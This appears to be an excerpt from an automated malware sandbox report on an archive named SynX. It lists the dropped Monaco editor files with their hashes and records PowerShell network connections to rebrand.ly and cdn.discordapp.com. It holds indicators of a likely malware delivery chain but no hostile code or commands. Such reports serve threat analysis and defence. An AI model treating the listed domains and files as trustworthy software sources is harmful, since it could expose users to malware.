SHA256: 7fde40b2b212d274617232de09452c6cb896e8a3c6b9e0b459f067cd07f31a99
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.it.js
text
MD5: a8855a662eb4d3a771fdab7ba6287def
SHA256: f67cec6dbf98c98c834638d20df53c5a770edada7f26ebf6d0b7dfec60f7a4ab
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.css
text
MD5: 233217455a3ef3604bf4942024b94f98
SHA256: 2ec118616a1370e7c37342da85834ca1819400c28f83abfcbbb1ef50b51f7701
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\xml\xml.js
text
MD5: 837efa6cbae0c226509b3f496c20660d
SHA256: 01896b21ba9fe9106316197da8118596101b966d4597aa794720f2561cbe15d8
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\contrib\suggest\media\String_16x.svg
image
MD5: 48e754cb54c78a85dcc9aaea9a27847e
SHA256: d1aa361f33564e8f9d527a01a66c7ce35d73f23417432e80ddf51f562770ee79
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\contrib\suggest\media\String_inverse_16x.svg
image
MD5: 6e5c0ce7ec09969f07ea6ee078ef8ad6
SHA256: 7d23c0f30cb9c05c81bb15785a3299772ae3cfbe51f3e04895aa1f23ffbeba5b
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\yaml\yaml.js
text
MD5: a812c4e3188d84d073a481b2cadc21bd
SHA256: 3730024b6d24b2ea2e9794123b038eee4383e9ae94fabd849aceb9596ad9d2d0
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\solidity\solidity.js
text
MD5: 0c117b4dc07c6a0a0d063d1504e04ea6
SHA256: e71c1df85ced6a51254a45152ceb9bab1ec3a003e8e4911ab35c737b52d42ae4
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\sql\sql.js
text
MD5: 4788f14a5c95a359af5ee52efbcf862d
SHA256: d1ab939c0ba1033252787f1f13b503d870ee5784a23a3b0b89857860075c035b
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\st\st.js
text
MD5: 7f3ef65a0f0f0aeedcd64d57f191d7a6
SHA256: 29e530c3a0dae1dc1b630a0867132a2513b1996b7eb0d1f4090336bd6004ff09
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\vb\vb.js
text
MD5: fd92faac5b4b3dfc2aa8cd7deb8efecf
SHA256: 5ca2ef383ccbfd449dceb76db571211374314054e22977bbeb785e2aaf8ecf24
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\swift\swift.js
text
MD5: 1bdd6f185cd2b5f4e11c6fac19e86175
SHA256: 5e9896a1e113b93502a1249b0cc78a844b000b803410a9a956854faac8528366
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\sb\sb.js
text
MD5: 95a88fd3ac1433bc136a792bd892c1d2
SHA256: 51c0bbde8b266514a37f00707c34bab27571b7eb38bddc5a45bb3f987ce5227d
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\rust\rust.js
text
MD5: f48a41336bcc1a195503c7a020ea508c
SHA256: 7c4e77f3bc6f3fb580c1c329f515e30830e6f6352d088b7948f73fa1662a3664
3164
WinRAR.exe

Find more information on the static content, and download it, in the full report.

Network activity

HTTP(S) requests: 0
TCP/UDP connections: 2
DNS requests: 2
Threats: 0

HTTP requests

No HTTP requests.

Connections

PID   Process         IP                  ASN               CN  Reputation
2756  powershell.exe  34.206.134.255:443  Amazon.com, Inc.  US  unknown
––    ––              104.16.11.231:443   Cloudflare Inc    US  shared

DNS requests

Domain              IP              Reputation
rebrand.ly          34.206.134.255  unknown
                    34.197.0.138
cdn.discordapp.com  104.16.11.231   unknown
                    104.16.10.231
                    104.16.9.231
                    104.16.12.231
                    104.16.13.231

Threats

No threats detected.

Debug output strings

No debug info.